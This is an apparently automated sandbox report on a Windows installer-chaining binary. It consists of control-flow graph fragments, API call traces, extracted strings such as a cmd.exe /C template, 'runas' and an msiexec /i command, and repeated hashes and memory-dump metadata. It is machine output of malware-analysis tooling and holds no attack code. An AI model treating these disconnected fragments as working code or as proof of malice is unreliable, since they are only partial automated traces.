7a54d-7a563 GetModuleFileNameW 1281->1293 1286->1281 1290 7a503-7a506 1286->1290 1287->1286 1290->1281 1302 7a5ae-7a5d9 call 842c0 call 661c0 1292->1302 1295 7a5eb-7a5f2 1293->1295 1296 7a569-7a570 1293->1296 1298 7a6d6-7a76b call 661c0 call 97080 call 661c0 * 2 call 8d3a0 call 87ab0 call 78c30 1295->1298 1299 7a5f8-7a602 1295->1299 1300 7a576-7a58c 1296->1300 1301 7a8bb-7a91f call cc62b call 7d1f0 1296->1301 1354 7a775-7a79e call 842c0 SetCurrentDirectoryW 1298->1354 1355 7a76d-7a770 1298->1355 1303 7a692-7a6c5 call 923d0 call 661c0 1299->1303 1304 7a608-7a63f call 8f890 call 661c0 1299->1304 1305 7a590-7a599 1300->1305 1335 7a5e3-7a5e6 call 84130 1302->1335 1336 7a5db-7a5de 1302->1336 1333 7a6c7-7a6ca 1303->1333 1334 7a6cf 1303->1334 1331 7a641-7a644 1304->1331 1332 7a649-7a67b call 841a0 call 661c0 1304->1332 1305->1305 1310 7a59b-7a5a9 call 654b0 1305->1310 1310->1302 1331->1332 1347 7a685-7a690 call 84130 1332->1347 1348 7a67d-7a680 1332->1348 1333->1334 1334->1298 1335->1295 1336->1335 1347->1334 1348->1347 1358 7a7a0-7a7a3 1354->1358 1359 7a7a8-7a7cc OpenMutexW 1354->1359 1355->1354 1358->1359 1360 7a7f3-7a7fe WaitForSingleObject 1359->1360 1361 7a7ce-7a7d7 GetLastError 1359->1361 1364 7a830-7a842 CloseHandle 1360->1364 1365 7a800-7a812 CloseHandle 1360->1365 1362 7a7e6-7a7f1 1361->1362 1363 7a7d9-7a7e4 1361->1363 1367 7a849 1362->1367 1366 7a819-7a825 call 7b440 1363->1366 1364->1367 1365->1366 1370 7a82a-7a82e 1366->1370 1369 7a84e-7a873 call 7a970 call 7d1f0 1367->1369 1369->1245 1370->1369
                                          APIs
                                            • Part of subcall function 0007AE40: GetModuleFileNameW.KERNEL32(00000000,?,00000104,D11C52E5,?,000F0616,000000FF), ref: 0007AE92
                                          • FindFirstFileW.KERNELBASE(?,00000000,.ini,00000004,?,?,?,00000000,00000000,?,D11C52E5), ref: 0007A321
                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0007A399
                                          • SetFilePointer.KERNELBASE(00000000,00000002,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0007A3E0
                                          • ReadFile.KERNELBASE(00000000,?,?,?,00000000,00000078,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0007A421
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0007A472
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 0007A55B
                                          • SetCurrentDirectoryW.KERNELBASE(00000000), ref: 0007A786
                                          • OpenMutexW.KERNEL32(00100000,00000000,Global\_MSIExecute), ref: 0007A7B4
                                          • GetLastError.KERNEL32 ref: 0007A7CE
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0007A7F6
                                          • CloseHandle.KERNEL32(00000000), ref: 0007A80C
                                          • CloseHandle.KERNEL32(00000000), ref: 0007A83C
                                          • FindClose.KERNEL32(?), ref: 0007A889
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$Close$Find$HandleModuleName$ChangeCreateCurrentDirectoryErrorFirstLastMutexNotificationObjectOpenPointerReadSingleWait
                                          • String ID: 2Wup1Wu$.ini$Global\_MSIExecute
                                          • API String ID: 2164323070-1607014661
                                          • Opcode ID: c96d329cb0ff05153b77911907a59d4a20bfca88539d13ab43cf7b371683755c
                                          • Instruction ID: 51015dc73fedfa247fef32f81d149f5bc12cb35536a421eb8ff212f435537fea
                                          • Opcode Fuzzy Hash: c96d329cb0ff05153b77911907a59d4a20bfca88539d13ab43cf7b371683755c
                                          • Instruction Fuzzy Hash: BD32D370A01649DFDB10DFA8CC48BEEBBF4BF45314F148258E419A72D2DB789A45CB91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1375 a9360-a9418 call 66450 call 65f70 * 2 call 86ec0 1384 a941e-a942d 1375->1384 1385 a9694-a969f call 63590 1375->1385 1386 a942f-a9432 call 65440 1384->1386 1387 a9437-a944a call d8667 1384->1387 1386->1387 1387->1385 1393 a9450-a9482 call 65f70 1387->1393 1396 a948c-a9490 1393->1396 1397 a9484-a9487 1393->1397 1398 a9496-a949d 1396->1398 1399 a9544-a9588 1396->1399 1397->1396 1402 a94a0-a94a6 1398->1402 1400 a958a-a9590 GetForegroundWindow 1399->1400 1401 a9593-a959f ShellExecuteExW 1399->1401 1400->1401 1405 a95a1-a95a7 1401->1405 1406 a95c6-a95e9 call a9720 1401->1406 1403 a94a8-a94ab 1402->1403 1404 a94c6-a94c8 1402->1404 1407 a94ad-a94b5 1403->1407 1408 a94c2-a94c4 1403->1408 1409 a94cb-a94cd 1404->1409 1410 a95a9-a95ac 1405->1410 1411 a95ae-a95c0 ShellExecuteExW 1405->1411 1418 a95eb-a9608 GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 1406->1418 1419 a960e-a962b call a96a0 1406->1419 1407->1404 1413 a94b7-a94c0 1407->1413 1408->1409 1414 a94cf-a94d4 1409->1414 1415 a9505-a9541 GetWindowsDirectoryW call 78c30 * 2 1409->1415 1410->1406 1410->1411 1411->1406 1413->1402 1413->1408 1417 a94d6-a94dc 1414->1417 1415->1399 1422 a94de-a94e1 1417->1422 1423 a94fc-a94fe 1417->1423 1418->1419 1430 a962d-a9630 1419->1430 1431 a9635-a9646 1419->1431 1426 a94f8-a94fa 1422->1426 1427 a94e3-a94eb 1422->1427 1428 a9501-a9503 1423->1428 1426->1428 1427->1423 1433 a94ed-a94f6 1427->1433 1428->1399 1428->1415 1430->1431 1434 a9648-a964b 1431->1434 1435 a9650-a9665 1431->1435 1433->1417 1433->1426 1434->1435 1436 a966f-a9693 call cc491 1435->1436 1437 a9667-a966a 1435->1437 1437->1436
                                          APIs
                                          • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,00000004,00000000,00000000,?), ref: 000A950E
                                          • GetForegroundWindow.USER32(?,00000004,00000000,00000000,?), ref: 000A958A
                                          • ShellExecuteExW.SHELL32(?), ref: 000A9597
                                          • ShellExecuteExW.SHELL32(?), ref: 000A95C0
                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId), ref: 000A95F5
                                          • GetProcAddress.KERNEL32(00000000), ref: 000A95FC
                                          • GetProcessId.KERNELBASE(?), ref: 000A9605
                                          • AllowSetForegroundWindow.USER32(00000000), ref: 000A9608
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ExecuteForegroundShellWindow$AddressAllowDirectoryHandleModuleProcProcessWindows
                                          • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                          • API String ID: 2271306907-986041216
                                          • Opcode ID: 75ccbcd6b7b1173cc6a3e6eb510007473b905986735e1956bcf3b501d1f69b26
                                          • Instruction ID: 567ece9e6008c72af242dfca03373a8bd5cda94552e30275fcb9b56b7a76d98b
                                          • Opcode Fuzzy Hash: 75ccbcd6b7b1173cc6a3e6eb510007473b905986735e1956bcf3b501d1f69b26
                                          • Instruction Fuzzy Hash: 64B1BE71A00249DFDB10DFE8C849BEEBBF5EF19314F108169E515EB292EB759A04CB60

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1663 827b0-8280d GetCurrentProcess OpenProcessToken 1665 8281c-8283d GetTokenInformation 1663->1665 1666 8280f-82817 GetLastError 1663->1666 1668 8286b-8286f 1665->1668 1669 8283f-82848 GetLastError 1665->1669 1667 828da-828ed 1666->1667 1670 828fd-82919 call cc491 1667->1670 1671 828ef-828f6 FindCloseChangeNotification 1667->1671 1673 828be GetLastError 1668->1673 1674 82871-828a0 AllocateAndInitializeSid 1668->1674 1672 8284a-82869 call 82920 GetTokenInformation 1669->1672 1669->1673 1671->1670 1672->1668 1672->1673 1675 828c4 1673->1675 1674->1675 1678 828a2-828bc EqualSid FreeSid 1674->1678 1679 828c6-828d3 call ccb60 1675->1679 1678->1679 1679->1667
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 000827F8
                                          • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00082805
                                          • GetLastError.KERNEL32 ref: 0008280F
                                          • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,000F1C95), ref: 00082839
                                          • GetLastError.KERNEL32 ref: 0008283F
                                          • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),000F1C95,000F1C95,000F1C95,000F1C95), ref: 00082865
                                          • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00082898
                                          • EqualSid.ADVAPI32(00000000,?), ref: 000828A7
                                          • FreeSid.ADVAPI32(?), ref: 000828B6
                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 000828F0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
                                          • String ID:
                                          • API String ID: 2037597787-0
                                          • Opcode ID: be44dfa3c22cb3a9b6695d2fb7485c12a12d72f84e664be029769974341833e9
                                          • Instruction ID: 525a653f6a80fe60b751bf24e3ae0ca44d0088732f5ec470eed2ad5a2703c444
                                          • Opcode Fuzzy Hash: be44dfa3c22cb3a9b6695d2fb7485c12a12d72f84e664be029769974341833e9
                                          • Instruction Fuzzy Hash: 3D413771901219EFEF209FA4CC49BEEBBB8FF08314F104119E551B22A0DB799945DBA4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1775 87860-878b9 LoadLibraryW 1776 878bb-878c9 GetProcAddress 1775->1776 1777 878e4-87929 GetSystemMetrics * 2 LoadImageW 1775->1777 1776->1777 1779 878cb-878d8 1776->1779 1778 8792c-8793c 1777->1778 1780 8794c-8795f 1778->1780 1781 8793e-87945 FreeLibrary 1778->1781 1782 878db-878dd 1779->1782 1781->1780 1782->1777 1783 878df-878e2 1782->1783 1783->1778
                                          APIs
                                          • LoadLibraryW.KERNEL32(ComCtl32.dll,D11C52E5,?,00000000,00000000), ref: 0008789E
                                          • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 000878C1
                                          • GetSystemMetrics.USER32(0000000C), ref: 000878FC
                                          • GetSystemMetrics.USER32(0000000B), ref: 00087912
                                          • LoadImageW.USER32(?,?,00000001,00000000,00000000,?), ref: 00087921
                                          • FreeLibrary.KERNEL32(00000000), ref: 0008793F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: LibraryLoadMetricsSystem$AddressFreeImageProc
                                          • String ID: ComCtl32.dll$LoadIconMetric
                                          • API String ID: 1983857168-764666640
                                          • Opcode ID: 4b342644029e39c73765bb4ae59cf241c6296a5106145f38c4c3c812c527c363
                                          • Instruction ID: bb5a1479fe52cfdaaa20e83ecf31fcf1f218cb32292fb5f64f20b51c49acc166
                                          • Opcode Fuzzy Hash: 4b342644029e39c73765bb4ae59cf241c6296a5106145f38c4c3c812c527c363
                                          • Instruction Fuzzy Hash: F4319571904259ABEB109F95CC48BAFBFF8FB48350F10416AF959E72D0DBB98900DB90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1802 7c450-7c49d 1803 7c4a3-7c4a5 1802->1803 1804 7c52c-7c554 1802->1804 1807 7c735-7c73a call 63590 1803->1807 1808 7c4ab-7c4b1 1803->1808 1805 7c5f2-7c5fb 1804->1805 1806 7c55a-7c55f 1804->1806 1809 7c601-7c64b call 65f70 call 64f00 call ce280 1805->1809 1810 7c6ee-7c72f call 7ce70 call cc491 1805->1810 1811 7c565-7c572 1806->1811 1812 7c730 call 63380 1806->1812 1820 7c73f call 641d0 1807->1820 1808->1807 1813 7c4b7-7c4d3 1808->1813 1855 7c64d-7c65e 1809->1855 1856 7c66c-7c66f 1809->1856 1817 7c574-7c579 1811->1817 1818 7c59d-7c59f 1811->1818 1812->1807 1813->1807 1832 7c4d9-7c4f8 call 842c0 call 84940 1813->1832 1817->1820 1823 7c57f-7c58c call cc4b6 1817->1823 1826 7c5a1-7c5aa call cc4b6 1818->1826 1827 7c5ac 1818->1827 1833 7c744-7c757 call d187f 1820->1833 1823->1833 1845 7c592-7c59b 1823->1845 1828 7c5ae-7c5ef call 98130 1826->1828 1827->1828 1828->1805 1851 7c4fd-7c515 1832->1851 1848 7c75f-7c766 1833->1848 1849 7c759-7c75b 1833->1849 1845->1828 1849->1848 1852 7c517-7c51a 1851->1852 1853 7c51f-7c526 1851->1853 1852->1853 1853->1803 1853->1804 1857 7c660-7c663 1855->1857 1858 7c668-7c66a 1855->1858 1859 7c671-7c67f 1856->1859 1857->1858 1860 7c6b3-7c6bd PathIsDirectoryW 1858->1860 1866 7c681-7c6a3 FindClose 1859->1866 1862 7c6d1-7c6d3 1860->1862 1863 7c6bf-7c6cc call 7c930 1860->1863 1864 7c6d5-7c6dd call 97cd0 1862->1864 1865 7c6e2-7c6e8 1862->1865 1863->1862 1864->1865 1865->1809 1865->1810 1869 7c6a5-7c6a8 1866->1869 1870 7c6ad-7c6b0 1866->1870 1869->1870 1870->1860
                                          APIs
                                          • DeleteFileW.KERNELBASE(?,D11C52E5,?,?,?,?,?,?,?,?,?,000F0C46,000000FF), ref: 0007C4C7
                                            • Part of subcall function 000842C0: _wcsrchr.LIBVCRUNTIME ref: 000842F9
                                            • Part of subcall function 00084940: _wcsrchr.LIBVCRUNTIME ref: 00084A01
                                          • FindFirstFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,000F0C46,000000FF), ref: 0007C63F
                                          • FindNextFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,000F0C46,000000FF), ref: 0007C677
                                          • FindClose.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000F0C46,000000FF), ref: 0007C682
                                          • PathIsDirectoryW.SHLWAPI(00000000), ref: 0007C6B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FileFind$_wcsrchr$CloseDeleteDirectoryFirstNextPath
                                          • String ID: 2Wup1Wu$p2Wu3Wu
                                          • API String ID: 1628590722-4124002120
                                          • Opcode ID: 11cc2a304ae2a231c6010012ec3105d8633456e76f7f73ea4e3cb61bb793efc3
                                          • Instruction ID: 6aa908a9058f669503e1ae04bab939b103fce2051e1fd140ca59bbce44c17381
                                          • Opcode Fuzzy Hash: 11cc2a304ae2a231c6010012ec3105d8633456e76f7f73ea4e3cb61bb793efc3
                                          • Instruction Fuzzy Hash: 15919171D006159FEB14DF78C885BEEBBF4BF09320F10822DE429A7291DB78A945CB94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FindHeapProcessResource
                                          • String ID: $ $ /i $"%s" $.msi$\\?\$msiexec.exe
                                          • API String ID: 3983090888-2815711023
                                          • Opcode ID: ec539e556cfe6a9f37a34a309995229bcc1d98815c74adbb256c15fceb7ae546
                                          • Instruction ID: 70700fa0235ea502dde278b8f3c14c9aa58819fcb55897d6b186e5a3e9ccc149
                                          • Opcode Fuzzy Hash: ec539e556cfe6a9f37a34a309995229bcc1d98815c74adbb256c15fceb7ae546
                                          • Instruction Fuzzy Hash: A752F171D00259CFDB24DBA8CC55BEDB7B2AF55304F1482ACE445AB292EB706F84CB91
                                          APIs
                                            • Part of subcall function 00091B40: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00091CA3
                                            • Part of subcall function 00091B40: GetProcAddress.KERNEL32(00000000), ref: 00091CAA
                                          • FindFirstFileW.KERNEL32(?,?), ref: 000919A2
                                          • FindClose.KERNEL32(00000000), ref: 000919D0
                                          • FindClose.KERNEL32(00000000), ref: 00091A59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Find$Close$AddressFileFirstHandleModuleProc
                                          • String ID: 2Wup1Wu
                                          • API String ID: 3469240197-403849135
                                          • Opcode ID: 52b91a0f6f22709c01aa1f70a7072cf129533c55b4929fd5512da9642d4fbe10
                                          • Instruction ID: f63a9dbb1aa1b057dbf32e7857e920ab12d3103850416134d379f752babc2e66
                                          • Opcode Fuzzy Hash: 52b91a0f6f22709c01aa1f70a7072cf129533c55b4929fd5512da9642d4fbe10
                                          • Instruction Fuzzy Hash: 08819030A05516DBDF60DF28C988BEAF7F5AF45320F1483A9D429972A1DB309D81DF91
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00084B8D
                                          • FindClose.KERNEL32(00000000,?,?), ref: 00084BEC
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Find$AllocateCloseFileFirstHeap
                                          • String ID: 2Wup1Wu
                                          • API String ID: 1673784098-403849135
                                          • Opcode ID: 6ec6bea6ce7b549b985c229c49bc175a8bc32e32e01319ed34fa59b43bc0f577
                                          • Instruction ID: 64353f4693f755c0cd1960f9008abfd3054306f5652a19920d01a6d779ac7092
                                          • Opcode Fuzzy Hash: 6ec6bea6ce7b549b985c229c49bc175a8bc32e32e01319ed34fa59b43bc0f577
                                          • Instruction Fuzzy Hash: 9031F131905619DBDB74EF54C888BAEB7F8FB08320F20469DE959A3380DBB49D44CB80
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000008,?,0009718E), ref: 000CA3DF
                                          • HeapAlloc.KERNEL32(00000000), ref: 000CA3E6
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000CA42C
                                          • HeapFree.KERNEL32(00000000), ref: 000CA433
                                            • Part of subcall function 000CA278: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,000CA422), ref: 000CA29C
                                            • Part of subcall function 000CA278: HeapAlloc.KERNEL32(00000000,?,000CA422), ref: 000CA2A3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Heap$Process$Alloc$Free
                                          • String ID:
                                          • API String ID: 1864747095-0
                                          • Opcode ID: d85132442feb3df3eb9c93a279c0586534a25a23632ed85258915e19c9dd09e2
                                          • Instruction ID: 77a119e974ae20f7a6b8a87268b6ee92e67212e32772e6f363c25639efd952e0
                                          • Opcode Fuzzy Hash: d85132442feb3df3eb9c93a279c0586534a25a23632ed85258915e19c9dd09e2
                                          • Instruction Fuzzy Hash: 8DF0243270425197EB6427BCBC0CFAF2A54EFC2750700402CF402C31A0DF64C881D762
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • RegCreateKeyA.ADVAPI32(80000001,00000001,?), ref: 0009C0CE
                                          • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,?), ref: 0009C0E6
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0009C3A4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Heap$AllocateCreateOpenProcessValue
                                          • String ID:
                                          • API String ID: 1583728613-0
                                          • Opcode ID: 46f343eda1f73a12cc4790e51ee66b2a62ab48478264202b8d6da62f86d7f0ee
                                          • Instruction ID: 89ff4f508c1e90cfcf38f7e37f54db706a360aca59993f0f28d599d776d60c15
                                          • Opcode Fuzzy Hash: 46f343eda1f73a12cc4790e51ee66b2a62ab48478264202b8d6da62f86d7f0ee
                                          • Instruction Fuzzy Hash: 90D1A272E002099FDB10CFA8C845BEEB7F9FF49320F14826AE915E7291DB759905CB90
                                          APIs
                                          • CoCreateInstance.OLE32(00109F6C,00000000,00000001,0011160C,000000B0,D11C52E5,00000098,00000000,00000000,000000A0,-00000010,000FA61C,000000FF,?,000A8361), ref: 000AEC39
                                            • Part of subcall function 000CC839: EnterCriticalSection.KERNEL32(00128FDC,?,00000000,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC844
                                            • Part of subcall function 000CC839: LeaveCriticalSection.KERNEL32(00128FDC,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC881
                                            • Part of subcall function 000CC7EF: EnterCriticalSection.KERNEL32(00128FDC,00000000,?,000639E7,001298D8,000FD280), ref: 000CC7F9
                                            • Part of subcall function 000CC7EF: LeaveCriticalSection.KERNEL32(00128FDC,?,000639E7,001298D8,000FD280), ref: 000CC82C
                                            • Part of subcall function 000CC7EF: RtlWakeAllConditionVariable.NTDLL ref: 000CC8A3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionCreateInstanceVariableWake
                                          • String ID:
                                          • API String ID: 3308385226-0
                                          • Opcode ID: 6e94f436957c0d9a3e74543e62f1bc3873aa6c14c19d44250cf62e24aee0a240
                                          • Instruction ID: 860720f727fefc5f71dae84affc44d8c37bf0bb26e22534bf120fa6ede14f6cf
                                          • Opcode Fuzzy Hash: 6e94f436957c0d9a3e74543e62f1bc3873aa6c14c19d44250cf62e24aee0a240
                                          • Instruction Fuzzy Hash: 5141DC71208384EFE724DF54DC85B8ABBB0FB05B20F244258E2149BAE1C3B56891CB54

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
